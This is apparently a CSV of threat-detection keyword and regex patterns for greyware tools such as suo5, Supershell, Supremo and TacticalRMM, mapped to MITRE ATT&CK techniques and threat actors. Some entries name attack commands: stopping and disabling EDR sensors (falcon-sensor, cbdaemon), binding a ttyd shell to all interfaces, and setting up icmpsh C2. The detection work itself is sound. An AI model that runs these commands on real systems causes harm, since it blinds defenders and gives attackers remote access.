"*fa6fe18df0631bb7bd24068d6da47b6e4154ff339c3ae6b3c49ff1894c47f3f3*",".{0,1000}fa6fe18df0631bb7bd24068d6da47b6e4154ff339c3ae6b3c49ff1894c47f3f3.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*fad409fc082d2967d1871ea683c569c17fede1264abf8c9548b389725ca93ad8*",".{0,1000}fad409fc082d2967d1871ea683c569c17fede1264abf8c9548b389725ca93ad8.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*fb2ea158fa75ca32d03110407cf7ef8f35e2191cff9f23464e783513d1561902*",".{0,1000}fb2ea158fa75ca32d03110407cf7ef8f35e2191cff9f23464e783513d1561902.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*fca8b047b25fa5005da1c58c490d936e4744a25f54e9275efd2e3d084f779951*",".{0,1000}fca8b047b25fa5005da1c58c490d936e4744a25f54e9275efd2e3d084f779951.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*fd4a2bc256f098cde43e556226d86a211c5504ca3768366d40486677c7f2ad2f*",".{0,1000}fd4a2bc256f098cde43e556226d86a211c5504ca3768366d40486677c7f2ad2f.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*fe3ff2cfe15f89b3357a4fa4648417f6b324ec1d27391b2e6c36e441e19340df*",".{0,1000}fe3ff2cfe15f89b3357a4fa4648417f6b324ec1d27391b2e6c36e441e19340df.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*fe77ec34521fe3747717123a4504214f1bea87fb4772efbdb1b827094ae0cd03*",".{0,1000}fe77ec34521fe3747717123a4504214f1bea87fb4772efbdb1b827094ae0cd03.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","0","#filehash","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*zema1/suo5*",".{0,1000}zema1\/suo5.{0,1000}","greyware_tool_keyword","suo5","http proxy tunneling tool","T1071 - T1073 - T1075 - T1105 - T1571","TA0008 - TA0011","N/A","N/A","C2","https://github.com/zema1/suo5","1","1","N/A","N/A","10","10","2036","190","2024-08-28T05:24:25Z","2022-11-22T11:45:26Z"
"*http://localhost:7681*",".{0,1000}http\:\/\/localhost\:7681.{0,1000}","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","1","N/A","N/A","10","10","1420","185","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
"*ttyd -i 0.0.0.0 -p 7681 *",".{0,1000}ttyd\s\-i\s0\.0\.0\.0\s\-p\s7681\s.{0,1000}","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1420","185","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
"*ttyd -i 0.0.0.0 -p 7682 *",".{0,1000}ttyd\s\-i\s0\.0\.0\.0\s\-p\s7682\s.{0,1000}","greyware_tool_keyword","supershell","Supershell is a C2 remote control platform accessed through WEB services. By establishing a reverse SSH tunnel it obtains a fully interactive Shell and supports multi-platform architecture Payload","T1090 - T1059 - T1021","TA0011 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/tdragon6/Supershell","1","0","N/A","N/A","10","10","1420","185","2023-09-26T13:53:55Z","2023-03-25T15:02:43Z"
"* start SupremoService*",".{0,1000}\sstart\sSupremoService.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"* Supremo.exe*",".{0,1000}\sSupremo\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*/Supremo.exe*",".{0,1000}\/Supremo\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\\.\pipe\Supremo*",".{0,1000}\\\\\.\\pipe\\Supremo.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","#namedpipe","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Control\SafeBoot\Network\SupremoService*",".{0,1000}\\Control\\SafeBoot\\Network\\SupremoService.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\CurrentControlSet\Services\SupremoService*",".{0,1000}\\CurrentControlSet\\Services\\SupremoService.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Program Files\Supremo\*",".{0,1000}\\Program\sFiles\\Supremo\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\ProgramData\SupremoRemoteDesktop*",".{0,1000}\\ProgramData\\SupremoRemoteDesktop.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\Supremo\*",".{0,1000}\\SOFTWARE\\Supremo\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Software\Supremo\Printer\*",".{0,1000}\\Software\\Supremo\\Printer\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\SOFTWARE\WOW6432Node\Supremo\*",".{0,1000}\\SOFTWARE\\WOW6432Node\\Supremo\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*\Supremo Remote Printer\*",".{0,1000}\\Supremo\sRemote\sPrinter\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Supremo.exe*",".{0,1000}\\Supremo\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SUPREMO.EXE-*.pf*",".{0,1000}\\SUPREMO\.EXE\-.{0,1000}\.pf.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Supremo_Client_2*",".{0,1000}\\Supremo_Client_2.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A"
"*\Supremo_Helper_2*",".{0,1000}\\Supremo_Helper_2.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A"
"*\Supremo_Service*",".{0,1000}\\Supremo_Service.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","pipename","10","10","N/A","N/A","N/A","N/A"
"*\SupremoHelper.exe*",".{0,1000}\\SupremoHelper\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\SupremoRemoteDesktop\*",".{0,1000}\\SupremoRemoteDesktop\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*\Temp\SupremoRemoteDesktop*",".{0,1000}\\Temp\\SupremoRemoteDesktop.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*application/x-supremo*",".{0,1000}application\/x\-supremo.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*HKCR\supremo\shell\*",".{0,1000}HKCR\\supremo\\shell\\.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry","10","10","N/A","N/A","N/A","N/A"
"*supremo remote control*",".{0,1000}supremo\sremote\scontrol.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","registry value","10","10","N/A","N/A","N/A","N/A"
"*Supremo.00.Client.log*",".{0,1000}Supremo\.00\.Client\.log.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Supremo.00.FileTransfer.log*",".{0,1000}Supremo\.00\.FileTransfer\.log.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*Supremo.exe *",".{0,1000}Supremo\.exe\s.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*supremogw*.nanosystems.it*",".{0,1000}supremogw.{0,1000}\.nanosystems\.it.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","agent network connection ","10","10","N/A","N/A","N/A","N/A"
"*supremohelper.exe*",".{0,1000}supremohelper\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SupremoRemoteDesktop\History.txt*",".{0,1000}SupremoRemoteDesktop\\History\.txt.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SupremoService.00.Service.log*",".{0,1000}SupremoService\.00\.Service\.log.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SupremoService.exe*",".{0,1000}SupremoService\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*SupremoSystem.exe*",".{0,1000}SupremoSystem\.exe.{0,1000}","greyware_tool_keyword","Supremo","Supremo - Remote access software","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta","RMM","https://www.supremocontrol.com","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A"
"*nhnfcgpcbfclhfafjlooihdfghaeinfc*",".{0,1000}nhnfcgpcbfclhfafjlooihdfghaeinfc.{0,1000}","greyware_tool_keyword","Surf VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*iocnglnmfkgfedpcemdflhkchokkfeii*",".{0,1000}iocnglnmfkgfedpcemdflhkchokkfeii.{0,1000}","greyware_tool_keyword","sVPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","N/A","detection in registry","8","10","N/A","N/A","N/A","N/A"
"*sysctl -w net.ipv4.icmp_echo_ignore_all=1*",".{0,1000}sysctl\s\-w\snet\.ipv4\.icmp_echo_ignore_all\=1.{0,1000}","greyware_tool_keyword","sysctl","Disable echo reply for icmpsh C2","T1040 - T1095 - T1090.001","TA0010 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/bdamele/icmpsh","1","0","N/A","N/A","4","10","1548","415","2018-04-06T17:15:44Z","2011-04-15T10:04:12Z"
"*systemctl disable cbdaemon*",".{0,1000}systemctl\sdisable\scbdaemon.{0,1000}","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*systemctl disable falcon-sensor.service*",".{0,1000}systemctl\sdisable\sfalcon\-sensor\.service.{0,1000}","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*systemctl stop cbdaemon*",".{0,1000}systemctl\sstop\scbdaemon.{0,1000}","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*systemctl stop falcon-sensor.service*",".{0,1000}systemctl\sstop\sfalcon\-sensor\.service.{0,1000}","greyware_tool_keyword","systemctl","Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes* deleting Registry keys so that tools do not start at run time* or other methods to interfere with security tools scanning or reporting information.","T1055 - T1070.004 - T1218.011","TA0007 - TA0005 - TA0040","N/A","N/A","Defense Evasion","https://attack.mitre.org/techniques/T1562/001/","1","0","N/A","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A"
"*cmd /c systeminfo*",".{0,1000}cmd\s\/c\ssysteminfo.{0,1000}","greyware_tool_keyword","systeminfo","gathering details about the local system","T1082 - T1012 - T1033","TA0007 - TA0002","N/A","N/A","Discovery","https://thedfirreport.com/2024/08/26/blacksuit-ransomware/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"*cmd.exe /c systeminfo*",".{0,1000}cmd\.exe\s\/c\ssysteminfo.{0,1000}","greyware_tool_keyword","systeminfo","gathering details about the local system","T1082 - T1012 - T1033","TA0007 - TA0002","N/A","N/A","Discovery","https://thedfirreport.com/2024/08/26/blacksuit-ransomware/","1","0","N/A","N/A","7","10","N/A","N/A","N/A","N/A"
"* rmm-installer.ps1*",".{0,1000}\srmm\-installer\.ps1.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"* tacticalrmm.exe*",".{0,1000}\stacticalrmm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/amidaware/rmmagent/releases/download/*",".{0,1000}\/amidaware\/rmmagent\/releases\/download\/.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/nats-rmm.conf*",".{0,1000}\/nats\-rmm\.conf.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/rmm/api/tacticalrmm/*",".{0,1000}\/rmm\/api\/tacticalrmm\/.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/rmm-installer.ps1*",".{0,1000}\/rmm\-installer\.ps1.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/tacticalagent.log*",".{0,1000}\/tacticalagent\.log.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/tacticalagent-v*-*.exe*",".{0,1000}\/tacticalagent\-v.{0,1000}\-.{0,1000}\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/tacticalagent-v*-linux-arm.exe*",".{0,1000}\/tacticalagent\-v.{0,1000}\-linux\-arm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/tacticalagent-v*-windows-amd64.exe*",".{0,1000}\/tacticalagent\-v.{0,1000}\-windows\-amd64\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/tacticalrmm.exe*",".{0,1000}\/tacticalrmm\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/tacticalrmm.git*",".{0,1000}\/tacticalrmm\.git.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/tacticalrmm/master/install.sh*",".{0,1000}\/tacticalrmm\/master\/install\.sh.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/tacticalrmm/releases/latest*",".{0,1000}\/tacticalrmm\/releases\/latest.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*/tacticalrmm-web.git*",".{0,1000}\/tacticalrmm\-web\.git.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","1","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*\InventoryApplicationFile\tacticalagent-v2*",".{0,1000}\\InventoryApplicationFile\\tacticalagent\-v2.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","registry","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*\Program Files\TacticalAgent\*",".{0,1000}\\Program\sFiles\\TacticalAgent\\.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*\ProgramData\TacticalRMM\*",".{0,1000}\\ProgramData\\TacticalRMM\\.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
"*\rmm-client-site-server.exe*",".{0,1000}\\rmm\-client\-site\-server\.exe.{0,1000}","greyware_tool_keyword","tacticalrmm","A remote monitoring & management tool","T1021.001 - T1219 - T1076 - T1563.002","TA0008 - TA0009 - TA0010 - TA0011","N/A","AvosLocker - Scattered Spider*","RMM","https://github.com/amidaware/tacticalrmm","1","0","N/A","N/A","10","10","3042","434","2024-08-20T19:49:17Z","2019-10-22T22:19:12Z"
